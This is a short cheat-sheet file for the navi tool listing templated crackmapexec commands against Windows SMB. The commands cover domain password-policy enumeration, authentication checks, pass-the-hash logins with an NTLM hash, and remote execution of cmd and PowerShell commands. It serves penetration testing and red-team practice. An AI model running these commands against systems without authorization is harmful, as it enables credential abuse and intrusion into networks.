% windows, crackmapexec, smb, kali
@ windows-variables
; From https://github.com/sealldeveloper/navi-cheats/

# Enumerate domain password policy information
crackmapexec smb <host_address> -u <username> -p '<password>' -d <domain> --pass-pol

# Basic SMB authentication and service enumeration
crackmapexec smb <host_address> -u <username> -p '<password>' -d <domain>

# Pass-the-hash authentication using NTLM hash
crackmapexec smb <host_address> -u <username> -H '<ntlm_hash>' -d <domain>

# Execute single command on remote system
crackmapexec smb <host_address> -u <username> -p '<password>' -d <domain> -x '<command>'

# Execute PowerShell command on remote system
crackmapexec smb <host_address> -u <username> -p '<password>' -d <domain> -X '<powershell_command>'